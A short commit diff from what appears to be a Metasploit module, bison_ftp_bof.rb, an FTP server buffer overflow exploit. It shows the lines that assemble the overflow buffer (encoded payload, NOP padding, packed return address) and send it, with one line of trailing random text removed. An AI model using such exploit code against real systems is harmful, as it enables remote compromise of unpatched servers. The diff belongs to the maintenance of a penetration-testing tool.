Update bison_ftp_bof.rb
parent
1dee6dca1b
commit
e3bca890c1
|
@ -81,7 +81,6 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||||
buf << payload.encoded
|
buf << payload.encoded
|
||||||
buf << make_nops(388 - payload.encoded.length)
|
buf << make_nops(388 - payload.encoded.length)
|
||||||
buf << [target.ret].pack('V')
|
buf << [target.ret].pack('V')
|
||||||
buf << rand_text_alpha(39)
|
|
||||||
print_status('Sending payload...')
|
print_status('Sending payload...')
|
||||||
|
|
||||||
sock.put(buf)
|
sock.put(buf)
|
||||||
|
|
Loading…
Reference in New Issue